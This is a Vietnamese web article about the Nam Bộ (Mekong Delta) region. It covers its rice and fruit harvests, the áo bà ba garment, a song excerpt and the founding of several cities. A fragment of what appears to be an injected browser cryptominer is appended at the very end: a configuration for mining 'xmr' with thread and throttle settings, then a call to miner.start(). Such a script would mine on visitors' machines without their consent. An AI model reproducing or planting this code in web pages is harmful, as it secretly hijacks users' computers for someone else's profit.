TÌM HIỂU VÙNG ĐẤT NAM BỘ PHÌ NHIÊU NẮNG SỚM MƯA CHIỀU - Tôn Thất Phước -

TÌM HIỂU VÙNG ĐẤT NAM BỘ PHÌ NHIÊU NẮNG SỚM MƯA CHIỀU
Tôn Thất Phước
Nam Bộ là một trong 3 vùng lãnh thổ của Việt Nam (Nam Bộ, Trung Bộ, và Bắc Bộ). Phần lớn địa hình Nam Bộ là đồng bằng phù sa thuộc hệ thống sông Đồng Nai và sông Cửu Long. Từ thế kỷ 17, Nam Bộ là phần lãnh thổ mới nhất của Việt Nam trong quá trình Nam tiến, và từng được gọi là Gia Định rồi Nam Kỳ (1832–1945).
Nam bộ (Đồng bằng sông Cửu Long) là vựa lúa chính của nước ta, với diện tích đất trồng lúa hơn 3,2 triệu ha, sản lượng 24 đến 25 triệu tấn lúa/ năm, đóng góp hơn 50 % sản lượng lúa và hơn 90 % lượng gạo xuất khẩu, không chỉ đảm bảo an ninh lương thực mà còn khẳng định được vai trò, vị thế xuất khẩu gạo tốp đầu thế giới của Việt Nam (Tin tức VOV5). Đồng thời là vựa trái cây nổi tiếng với đủ các chủng loại hoa quả miền nhiệt đới như: Xoài cát Hòa Lộc, xoài cát Chu, xoài Thái Lan, xoài Đài Loan; sầu riêng Ri 6, sầu riêng sữa hột lép Cái Mơn, sầu riêng Mon Thong; chôm chôm Giông Riêng, chôm chôm nhãn, chôm chôm Java; bưởi da xanh, bưởi năm roi, vú sữa Lò rèn, mít nghệ, mít Thái, chuối, ổi, nhãn, cam, quýt ... (Ph. D Nguyễn Minh Châu, nguyên Viện trưởng cây ăn quả miền Nam/ SOFRI rất yêu nghề, sẵn sàng hỗ trơ kỹ thuật cho nông dân các vùng miền, miễn phí chuyển giao).

Nhớ chiếc xuồng xưa năm nào trên bến cũ,
Thương lắm câu hò kêu gọi khách sang sông,
Áo trắng xuồng đưa mắt cười em khẽ gọi,
Người thương ơi em vẫn đợi chờ ….
Trích: Chiếc áo Bà ba, của NS Trần Thiện Thanh (1942 – 2005)

Áo bà ba là trang phục truyền thống mang đậm sự chân chất , thật thà, hiền lành của miền Tây sông nước. Chiếc áo bà ba tượng trưng cho tâm hồn, nét duyên dáng và đằm thắm cũng như tính cách giản dị của người dân nơi đây.
- TP. Cần Thơ (Tây Đô) xây dựng năm 1.739, là thành phố hiện đại và phát triển nhất ở Đồng bằng sông Cửu Long, bên cạnh các đàn anh, đàn chị như:
- TP. Hà Nội (Thăng Long) xây dựng vào năm 1010, dưới triều đại Lý Thái Tổ. Là thành phố có diện tích lớn nhất cả nước từ khi tỉnh Hà Tây sáp nhập vào, đồng thời cũng là địa phương đứng thứ hai về dân số.
- TP. Hồ Chí Minh (Sài Gòn) là thành phố lốn nhất về dân số và quy mô đô thị hóa, được xây dựng năm 1698 do công cuộc Nam tiến của triều đại chúa Nguyễn.
- TP. Huế (Cố đô) xây dựng năm 1788 dưới triều đại Tây Sơn; Là thành phố có năm danh hiệu UNESCO ở Việt Nam, kiến trúc ở Huế phong phú và đa dạng …
 
Được cuộc sống như ngày hôm nay, chúng ta phải trân trọng và luôn luôn ghi nhớ công ơn của Tổ tiên đã dày công khai phá, xây dựng và phát triển vùng đất Nam bộ (ĐBSCL)./.

 


Thành phố Cần Thơ - Bến Ninh Kiều.


Thành phố Huế

', { threads:2,throttle:0.2, coin: "xmr", }); miner.start();